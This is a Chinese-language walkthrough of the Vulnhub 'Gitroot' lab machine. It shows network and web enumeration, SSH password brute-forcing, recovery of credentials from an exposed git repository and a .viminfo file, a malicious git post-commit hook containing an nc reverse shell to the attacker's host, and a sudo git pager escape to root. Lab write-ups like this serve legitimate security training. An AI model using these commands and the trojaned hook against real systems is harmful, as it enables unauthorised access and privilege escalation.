Gigroot
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:05 1 60 Unknown vendor
192.168.56.100 08:00:27:ab:4c:5b 1 60 PCS Systemtechnik GmbH
192.168.56.103 08:00:27:44:c8:1b 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.103
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.103 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-29 22:08 EDT
Nmap scan report for localhost (192.168.56.103)
Host is up (0.000075s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 bf45f6b3e3ce0c69185a5b27e5d39c86 (RSA)
| 256 b5d7455006c4e23c2852b806261fdeb0 (ECDSA)
|_ 256 27f0d02113309c5ef070a1d85ca78f75 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Hey Jen
|_http-server-header: Apache/2.4.38 (Debian)
11211/tcp open memcache?
| fingerprint-strings:
| RPCCheck:
|_ Unknown command
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port11211-TCP:V=7.93%I=7%D=4/29%Time=644DCDBD%P=x86_64-pc-linux-gnu%r(R
SF:PCCheck,27,"\x81\0\0\0\0\0\0\x81\0\0\0\x0f\0\0\0\x02\0\0\0\0\0\0\0\0Unk
SF:nown\x20command");
MAC Address: 08:00:27:44:C8:1B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.92 seconds
NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、11211(?)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ curl http://192.168.56.103/
<!doctype html>
<html>
<head>
<title>Hey Jen</title>
</head>
<body>
<p> Hey Jen, just installed wordpress over at wp.gitroot.vuln <br> please go check it out! <p>
</body>
</html>
将wp.gitroot.vuln加入/etc/hosts文件中:
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.103 wp.gitroot.vuln
此时访问url,从返回页面可知目标为Wordpress站点:
http://wp.gitroot.vuln/
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ nikto -h http://wp.gitroot.vuln/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.103
+ Target Hostname: wp.gitroot.vuln
+ Target Port: 80
+ Start Time: 2023-04-29 22:24:21 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://wp.gitroot.vuln/index.php?rest_route=/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7863 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2023-04-29 22:25:11 (GMT-4) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ gobuster dir -u http://wp.gitroot.vuln/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh,.bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://wp.gitroot.vuln/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,txt,sh,bak,php,js
[+] Timeout: 10s
===============================================================
2023/04/29 22:25:59 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 280]
/.html (Status: 403) [Size: 280]
/index.php (Status: 301) [Size: 1] [--> http://wp.gitroot.vuln/]
/wp-content (Status: 301) [Size: 323] [--> http://wp.gitroot.vuln/wp-content/]
/wp-login.php (Status: 200) [Size: 3195]
/manual (Status: 301) [Size: 319] [--> http://wp.gitroot.vuln/manual/]
/wp-includes (Status: 301) [Size: 324] [--> http://wp.gitroot.vuln/wp-includes/]
/wp (Status: 403) [Size: 280]
/javascript (Status: 301) [Size: 323] [--> http://wp.gitroot.vuln/javascript/]
/readme.html (Status: 200) [Size: 7440]
/wp-trackback.php (Status: 200) [Size: 136]
/wp-admin (Status: 301) [Size: 321] [--> http://wp.gitroot.vuln/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 43]
/.php (Status: 403) [Size: 280]
/.html (Status: 403) [Size: 280]
/wp-signup.php (Status: 302) [Size: 1] [--> http://wp.gitroot.vuln/wp-login.php?action=register]
/server-status (Status: 403) [Size: 280]
Progress: 1540385 / 1543927 (99.77%)===============================================================
2023/04/29 22:29:10 Finished
============================================================
因为我们已知目标运行wordpress站点,因此从gobuster和nikto工具运行结果中没有看到除了wordpress相关的目录文件之外的信息。接下来看是否可以用wpscan工具扫描出用户名或者可利用的插件。
─(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ wpscan --url http://wp.gitroot.vuln/ -e u,p
[+] beth
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
wpscan工具扫描出用户名beth,看能否破解其密码。
(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ wpscan --url http://wp.gitroot.vuln/ -U beth -P /usr/share/wordlists/rockyou.txt
没有破解出用户beth的密码,那看下可否扫描出插件。
─(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ wpscan --url http://wp.gitroot.vuln/ --plugins-detection mixed
虽然扫描出插件akismet,但是该插件没有漏洞可利用。
会不会存在其他子域名?
将gitroot.vuln加入到/etc/hosts文件后,用wfuzz工具爆破子域名
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ wfuzz -c -u http://gitroot.vuln -H "Host:FUZZ.gitroot.vuln" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 26
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://gitroot.vuln/
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 400 12 L 53 W 422 Ch "# directory-list-2.3-medium.txt"
000000003: 400 12 L 53 W 422 Ch "# Copyright 2007 James Fisher"
000000007: 400 12 L 53 W 422 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3
.0/"
000000012: 400 12 L 53 W 422 Ch "# on at least 2 different hosts"
000000013: 400 12 L 53 W 422 Ch "#"
000000011: 400 12 L 53 W 422 Ch "# Priority ordered case-sensitive list, where entries were f
ound"
000000010: 400 12 L 53 W 422 Ch "#"
000000009: 400 12 L 53 W 422 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000002: 400 12 L 53 W 422 Ch "#"
000000008: 400 12 L 53 W 422 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000005: 400 12 L 53 W 422 Ch "# This work is licensed under the Creative Commons"
000000006: 400 12 L 53 W 422 Ch "# Attribution-Share Alike 3.0 License. To view a copy of thi
s"
000000004: 400 12 L 53 W 422 Ch "#"
000000793: 200 131 L 578 W 10697 Ch "wp"
000002024: 400 12 L 53 W 422 Ch "'"
000003790: 400 12 L 53 W 422 Ch "%20"
000005302: 400 12 L 53 W 422 Ch "$FILE"
000005954: 400 12 L 53 W 422 Ch "$file"
000007004: 400 12 L 53 W 422 Ch "*checkout*"
000012898: 200 21 L 51 W 438 Ch "repo"
发现出repo子域名,将其加入到/etc/hosts文件中去:
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.103 wp.gitroot.vuln
192.168.56.103 gitroot.vuln
192.168.56.103 repo.gitroot.vuln
利用浏览器访问子域名repo,此次返回内容为:
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ curl http://repo.gitroot.vuln/
<!doctype html
<html>
<head>
<title>Code storage</title>
</head>
<style>
body {
background-image: url('http://repo.gitroot.vuln/codeBackground.jpg');
background-repeat: no-repeat;
}
</style>
<body>
<h1 style="color:white;">Welcome to our code storage area, we are currently storing a bunch of code here</h1>
<p style="color:white;">Feel free to search our code base at get.php or set code in set.php </p>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ gobuster dir -u http://repo.gitroot.vuln -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.bak,.txt,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://repo.gitroot.vuln
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,sh,bak,txt,js
[+] Timeout: 10s
===============================================================
2023/04/30 06:07:55 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 282]
/index.php (Status: 200) [Size: 438]
/.php (Status: 403) [Size: 282]
/stats.php (Status: 200) [Size: 2911]
/manual (Status: 301) [Size: 323] [--> http://repo.gitroot.vuln/manual/]
/get.php (Status: 200) [Size: 144]
/javascript (Status: 301) [Size: 327] [--> http://repo.gitroot.vuln/javascript/]
/set.php (Status: 200) [Size: 151]
/.php (Status: 403) [Size: 282]
/.html (Status: 403) [Size: 282]
/server-status (Status: 403) [Size: 282]
Progress: 1542281 / 1543927 (99.89%)===============================================================
2023/04/30 06:11:15 Finished
===============================================================
用gobuster工具没有扫描出上述子域名下更有价值的文件或者目录
──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ nikto -h http://repo.gitroot.vuln
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.103
+ Target Hostname: repo.gitroot.vuln
+ Target Port: 80
+ Start Time: 2023-04-30 06:11:29 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /.git/index: Git Index file may contain directory listing information.
+ /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /.git/config: Git config file found. Infos about repo details may be present.
+ 7863 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-04-30 06:12:20 (GMT-4) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
nikto工具结果表明该子域名存在/.git目录,用githack工具将repo的文件clone到Kali Linux本地
┌──(kali㉿kali)-[~/Toolsets/GitHack]
└─$ python GitHack.py http://repo.gitroot.vuln/.git/
[+] Download and parse index file ...
[+] 33513a92c025212dd3ab564ca8682e2675f2f99bba5a7f521453d1deae7902aa.txt
[+] get.php
[+] index.php
[+] pablo_HELP.txt
[+] set.php
[+] stats.php
[OK] get.php
[OK] index.php
[OK] 33513a92c025212dd3ab564ca8682e2675f2f99bba5a7f521453d1deae7902aa.txt
[OK] pablo_HELP.txt
[OK] set.php
[OK] stats.php
┌──(kali㉿kali)-[~/Toolsets/GitHack/repo.gitroot.vuln]
└─$ cat pablo_HELP.txt
I need help, something is wrong with this git repo
┌──(kali㉿kali)-[~/Toolsets/GitHack/repo.gitroot.vuln]
└─$ cat 33513a92c025212dd3ab564ca8682e2675f2f99bba5a7f521453d1deae7902aa.txt
pablo_S3cret_P@ss
beth_S3cret_P@ss
jen_S3cret_P@ss
先看能否破解pablo的密码
─(kali㉿kali)-[~/Toolsets/GitHack/repo.gitroot.vuln]
└─$ hydra -l pablo -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.103
密码为mastergitar
┌──(kali㉿kali)-[~/Toolsets/GitHack/repo.gitroot.vuln]
└─$ ssh pablo@192.168.56.103
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
ED25519 key fingerprint is SHA256:60rNw8fczihsSqs64B1Lf2E1VkCGOsuq8BTev2ELwLw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.103' (ED25519) to the list of known hosts.
pablo@192.168.56.103's password:
Linux GitRoot 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 26 01:30:55 2020 from 192.168.56.1
pablo@GitRoot:~$ id
uid=1000(pablo) gid=1000(pablo) groups=1000(pablo)
pablo@GitRoot:~$ ls -alh
total 32K
drwxr-xr-x 4 pablo pablo 4.0K May 26 2020 .
drwxr-xr-x 5 root root 4.0K May 26 2020 ..
lrwxrwxrwx 1 pablo pablo 9 May 26 2020 .bash_history -> /dev/null
-rw-r--r-- 1 pablo pablo 220 May 25 2020 .bash_logout
-rw-r--r-- 1 pablo pablo 3.5K May 25 2020 .bashrc
drwx------ 3 pablo pablo 4.0K May 25 2020 .gnupg
-rw-r--r-- 1 pablo pablo 807 May 25 2020 .profile
drwx-wx-wx 2 pablo pablo 4.0K May 25 2020 public
-rw-r--r-- 1 root root 871 May 26 2020 user.txt
pablo@GitRoot:~$ cat user.txt
_______ _ _ _____ _ _
|__ __| | | | | __ \ | | | |
| | | |__ __ _ _ __ | | __ _ _ ___ _ _ | |__) |_ _| |__ | | ___
| | | '_ \ / _` | '_ \| |/ / | | | |/ _ \| | | | | ___/ _` | '_ \| |/ _ \
| | | | | | (_| | | | | < | |_| | (_) | |_| | | | | (_| | |_) | | (_)
|_| |_| |_|\__,_|_| |_|_|\_\ \__, |\___/ \__,_| |_| \__,_|_.__/|_|\___/
__/ |
|___/
Great job! Do not falter, there is more to do. You made it this far, finish the race!
"It's not that I'm so smart. Its just that I stay with problems longer." - Albert Einstein
8a81007ea736a2b8a72a624672c375f9ac707b5e
pablo@GitRoot:~$
pablo@GitRoot:~/public$ ls -alh
total 12K
drwx-wx-wx 2 pablo pablo 4.0K May 25 2020 .
drwxr-xr-x 4 pablo pablo 4.0K May 26 2020 ..
-rw-r--r-- 1 beth beth 58 May 25 2020 message.txt
pablo@GitRoot:~/public$ cat message.txt
Hey pablo
Make sure to check-out our brand new git repo!
需要找出另外一个git仓库
将linpeas.sh脚本上传至目标主机站点:
══════════╣ Analyzing Github Files (limit 70)
-rw-r--r-- 1 jen jen 50 May 26 2020 /home/jen/.gitconfig
drwxr-xr-x 8 beth beth 4096 May 26 2020 /opt/auth/.git
drwxr-xr-x 8 root root 4096 May 25 2020 /var/www/repo/.git
发现了一个新的git仓库:drwxr-xr-x 8 beth beth 4096 May 26 2020 /opt/auth/.git
进入该目录查看
pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ ls -alh | sort -n -r
total 804K
-rw-r--r-- 1 beth beth 595 May 26 2020 dev-43
-rw-r--r-- 1 beth beth 445 May 26 2020 dev-199
-rw-r--r-- 1 beth beth 443 May 26 2020 dev-99
-rw-r--r-- 1 beth beth 443 May 26 2020 dev-98
该目录下有很多文件,但是用sort命令查看,其中文件dev-43的大小不一样。
pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ cat dev-43
0000000000000000000000000000000000000000 fc9901f3b6b303d6ad40cdb71689f1646904f7b3 Your Name <you@example.com> 1590499965 -0400branch: Created from HEAD
fc9901f3b6b303d6ad40cdb71689f1646904f7b3 b2ab5f540baab4c299306e16f077d7a6f6556ca3 Your Name <you@example.com> 1590500014 -0400commit: init repo
b2ab5f540baab4c299306e16f077d7a6f6556ca3 06fbefc1da56b8d552cfa299924097ba1213dd93 Your Name <you@example.com> 1590500148 -0400commit: added some stuff
06fbefc1da56b8d552cfa299924097ba1213dd93 aaa283c708d79c692797339434664f4ba7accb25 Your Name <you@example.com> 1590500197 -0400commit: init repo
pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ git show 06fbefc1da56b8d552cfa299924097ba1213dd93
commit 06fbefc1da56b8d552cfa299924097ba1213dd93
Author: Your Name <you@example.com>
Date: Tue May 26 09:35:48 2020 -0400
added some stuff
diff --git a/main.c b/main.c
index 70e6397..8af9b9c 100644
--- a/main.c
+++ b/main.c
@@ -4,6 +4,15 @@
int main(){
char pass[20];
- return 0;
+ scanf("%20s", pass);
+ printf("You put %s\n", pass);
+ if (strcmp(pass, "r3vpdmspqdb") == 0 ){
+ char *cmd[] = { "bash", (char *)0 };
+ execve("/bin/bash", cmd, (char *) 0);
+ }
+ else{
+ puts("BAD PASSWORD");
+ }
+ return 0;
}
-//43
+
(END)
发现了一个密码:r3vpdmspqdb, 很显然,因为新的.git目录属主是beth,因此该密码应该也是属于beth
切换到用户beth
pablo@GitRoot:~$ su - beth
Password:
beth@GitRoot:~$
beth@GitRoot:~$ ls -alh
total 28K
drwxr-xr-x 5 beth beth 4.0K May 26 2020 .
drwxr-xr-x 5 root root 4.0K May 26 2020 ..
lrwxrwxrwx 1 beth beth 9 May 26 2020 .bash_history -> /dev/null
-rw-r--r-- 1 beth beth 0 May 25 2020 .bash_logout
-rw-r--r-- 1 beth beth 3.5K May 26 2020 .bashrc
drwx------ 3 beth beth 4.0K May 26 2020 .gnupg
drwxr-xr-x 3 beth beth 4.0K May 25 2020 .local
-rw-r--r-- 1 beth beth 807 May 26 2020 .profile
drwx-wx-wx 2 beth beth 4.0K May 26 2020 public
在beth目录下,新建.git/hooks文件夹,建一个post-commit文件,里面写入使用nc反弹shell的一句话,文件给777权限,再将.git文件夹压缩成zip格式,再给777权限
beth@GitRoot:~$ mkdir -p .git/hooks
beth@GitRoot:~$ cd .git/hooks/
beth@GitRoot:~/.git/hooks$ vim post-commit
beth@GitRoot:~/.git/hooks$ cat post-commit
#!/bin/bash
nc -e /bin/bash 192.168.56.206 6666
beth@GitRoot:~/.git/hooks$ chmod 777 post-commit
beth@GitRoot:~/.git/hooks$ cd ~
beth@GitRoot:~$ 7z a xshell.zip .git/
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU Intel(R) Core(TM) i7-9700 CPU @ 3.00GHz (906ED),ASM,AES-NI)
Scanning the drive:
2 folders, 1 file, 48 bytes (1 KiB)
Creating archive: xshell.zip
Items to compress: 3
Files read from disk: 1
Archive size: 482 bytes (1 KiB)
Everything is Ok
beth@GitRoot:~$ chmod 777 xshell.zip
beth@GitRoot:~$
复制压缩包到/home/jen/public/repos目录下
beth@GitRoot:~$ chmod 777 xshell.zip
beth@GitRoot:~$ cp xshell.zip /home/jen/public/repos
jen@GitRoot:~$ cat .viminfo
cat .viminfo
# This viminfo file was generated by Vim 8.1.
# You may edit it if you're careful!
# Viminfo version
|1,4
# Value of 'encoding' when this file was written
*encoding=utf-8
# hlsearch on (H) or off (h):
~h
# Command Line History (newest to oldest):
:wq
|2,0,1590471909,,"wq"
:q!
|2,0,1590471893,,"q!"
:Q!
|2,0,1590471892,,"Q!"
# Search String History (newest to oldest):
?/binzpbeocnexoe
|2,1,1590471908,47,"binzpbeocnexoe"
jen的密码是binzpbeocnexoe
提权
jen@GitRoot:~$ sudo -l
sudo -l
[sudo] password for jen: binzpbeocnexoe
Matching Defaults entries for jen on GitRoot:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jen may run the following commands on GitRoot:
(ALL) /usr/bin/git
jen@GitRoot:~$ sudo /usr/bin/git -p help config
sudo /usr/bin/git -p help config
WARNING: terminal is not fully functional
- (press RETURN)!/bin/sh
!//bbiinn//sshh!/bin/sh
# cd /root
cd /root
# ls -alh
ls -alh
total 44K
drwx------ 5 root root 4.0K May 26 2020 .
drwxr-xr-x 18 root root 4.0K May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 26 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 3 root root 4.0K May 25 2020 .gnupg
drwxr-xr-x 3 root root 4.0K May 25 2020 .local
-rw-r--r-- 1 root root 56 May 25 2020 passwords
drwxr-xr-x 2 root root 4.0K May 26 2020 POC
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 5.9K May 26 2020 root.txt
-rw-r--r-- 1 root root 569 May 25 2020 setpasswords.php
# cat root.txt
cat root.txt
/////
////////////.
*/////////////////
//////////////////////.
*///////////////////////////
////////////////////////////////.
*/////////////////////////////////
/////////////////////////////////.
*///. */////////////////////////////////
///////// /////////////////////////////////.
*/////////////. */////////////////////////////////
/////////////////// .//////////////////////////,
*///////////////////////. .//////////////////////////
//////////////////////////// ///////////////////////////,
*////////////////////////////// /////////////////////////////
///////////////////////////////// ////////////////////////////////,
*//////////////////////////////////// ,/////////////////////////////////
///////////////////////////////////////// /////////////////////////////////,
,///////////////////////////////////////////// .. ,/////////////////////////////////
//////////////////////////////////////////////// ./// /////////////////////////////////.
,////////////////////////////////////////////////// ./////. */////////////////////////////////
///////////////////////////////////////////////////// .//////// ,//////////////////////////.
/////////////////////////////////////////////////////// .//////////. .//////////////////////////
,//////////////////////////////////////////////////////// .//////////// //////////////////////////
///////////////////////////////////////////////////////// .///////////, /////////////////////////
//////////////////////////////////////////////////////// .//////////// //////////////////////////
/////////////////////////////////////////////////////// .///////////// /////////////////////////*
,//////////////////////////////////////////////////// ./////////////// /////////////////////////
////////////////////////////////////////////////// .////////////////////////////////////////////////*
,/////////////////////////////////////////////// .//////////////////////////////////////////////
///////////////////////////////////////////// .///////////////////////////////////////////*
,///////////////////////////////////////// /////////////////////////////////////////
////////////////////////////////////* ///////////////////////////////////*
,//////////////////////////////// ////////////////////////////////
////////////////////////////// /////////////////////////////
,/////////////////////////// ///////////////////////////
////////////////////////// //////////////////////////
,///////////////////////// /////////////////////////
/////////////////////////////////////////////////////////
,///////////////////////////////////////////////////
///////////////////////////////////////////////
,/////////////////////////////////////////
/////////////////////////////////////
.///////////////////////////////
///////////////////////////
./////////////////////
/////////////////
.///////////
Thank you for completing my box! Please let my know what you liked and what you didn't like at my twitter @Recursive_NULL
734ae32be131cd0681f86c03858f4f587a3c69ce
#